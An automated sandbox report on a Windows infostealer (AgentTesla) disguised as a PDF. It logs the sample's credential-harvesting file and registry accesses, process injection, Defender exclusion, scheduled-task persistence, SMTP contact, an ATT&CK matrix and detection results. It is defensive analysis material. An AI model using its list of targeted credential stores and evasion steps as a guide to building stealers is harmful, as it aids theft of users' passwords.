                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeQueries volume information: C:\Users\user\AppData\Roaming\vmPeKTe.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1483006470.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1608, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1608, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1483006470.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1483006470.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe PID: 7552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1608, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		12
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569777 Sample: REQUEST FOR HOPPER SCALE AN... Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 46 smtp.yandex.ru 2->46 48 api.ipify.org 2->48 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Sigma detected: Scheduled temp file as task from temp location 2->58 60 14 other signatures 2->60 8 REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe 7 2->8         started        12 vmPeKTe.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\Roaming\vmPeKTe.exe, PE32 8->38 dropped 40 C:\Users\user\...\vmPeKTe.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpDF64.tmp, XML 8->42 dropped 44 REQUEST FOR HOPPER...MACHINE.pdf.exe.log, ASCII 8->44 dropped 62 Writes to foreign memory regions 8->62 64 Allocates memory in foreign processes 8->64 66 Adds a directory exclusion to Windows Defender 8->66 14 RegSvcs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 22 RegSvcs.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 50 smtp.yandex.ru 77.88.21.158, 49711, 49714, 49717 YANDEXRU Russian Federation 14->50 52 api.ipify.org 104.26.13.205, 443, 49709, 49713 CLOUDFLARENETUS United States 14->52 74 Loading BitLocker PowerShell Module 18->74 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        76 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->76 78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Tries to harvest and steal ftp login credentials 22->80 84 2 other signatures 22->84 34 conhost.exe 24->34         started        82 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 26->82 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe65%VirustotalBrowse
                    REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\vmPeKTe.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\vmPeKTe.exe58%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.glR0%Avira URL Cloudsafe
                    http://crl.globalsign0%Avira URL Cloudsafe
                    http://www.elderscrolls.com/skyrim/character0%Avira URL Cloudsafe
                    http://www.elderscrolls.com/skyrim/player0%Avira URL Cloudsafe
                    http://www.elderscrolls.com/skyrim/characterT0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    smtp.yandex.ru
                    		77.88.21.158
                    		truefalse
                      		high
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.glRRegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.globalsignRegSvcs.exe, 0000000F.00000002.3892607664.00000000094AA000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.elderscrolls.com/skyrim/characterREQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, vmPeKTe.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.ipify.orgREQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.elderscrolls.com/skyrim/characterTREQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, vmPeKTe.exe.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://account.dyn.com/REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org/tRegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://crl.glRegSvcs.exe, 0000000F.00000002.3883053125.0000000005FA5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameREQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1426563917.00000000036DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, vmPeKTe.exe, 0000000B.00000002.1486889993.000000000296E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.elderscrolls.com/skyrim/playervmPeKTe.exe, 0000000B.00000002.1486889993.00000000025DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    77.88.21.158
                                    		smtp.yandex.ruRussian Federation
                                    		13238YANDEXRUfalse
                                    104.26.13.205
                                    		api.ipify.orgUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1569777
                                    Start date and time:2024-12-06 09:57:00 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 20s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@21/15@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 98%
                                    • Number of executed functions: 160
                                    • Number of non-executed functions: 20
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:57:54API Interceptor1x Sleep call for process: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe modified
                                    03:57:56API Interceptor37x Sleep call for process: powershell.exe modified
                                    03:57:59API Interceptor9417044x Sleep call for process: RegSvcs.exe modified
                                    03:58:00API Interceptor1x Sleep call for process: vmPeKTe.exe modified
                                    09:57:57Task SchedulerRun new task: vmPeKTe path: C:\Users\user\AppData\Roaming\vmPeKTe.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    77.88.21.1587Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                      e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                        DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                          DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                              datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                  0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                    BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                      REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                        104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                        • api.ipify.org/
                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                        • api.ipify.org/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        smtp.yandex.ru7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        DHL Delivery Invoice.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 77.88.21.158
                                                        DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                        • 77.88.21.158
                                                        BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                        • 77.88.21.158
                                                        REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        api.ipify.orgPO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 104.26.13.205
                                                        https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 104.26.13.205
                                                        lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 172.67.74.152
                                                        OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                        • 172.67.74.152
                                                        8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.13.205
                                                        lUy4SKlE6A.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        xFHqehx1tb.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                        • 104.26.12.205
                                                        https://app.peony.ink/view/902b02a8-11f0-4e28-89b1-5318035c10ebGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                        • 104.26.12.205

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        YANDEXRUdtkB4s3lqj.lnkGet hashmaliciousUnknownBrowse
                                                        • 213.180.204.127
                                                        https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                                                        • 213.180.204.90
                                                        7Gt3icFvQW.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                        • 87.250.251.119
                                                        idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                        • 87.250.251.119
                                                        e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 77.88.21.158
                                                        https://bielefelde.de/Get hashmaliciousUnknownBrowse
                                                        • 77.88.21.119
                                                        pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                                                        • 95.108.221.122
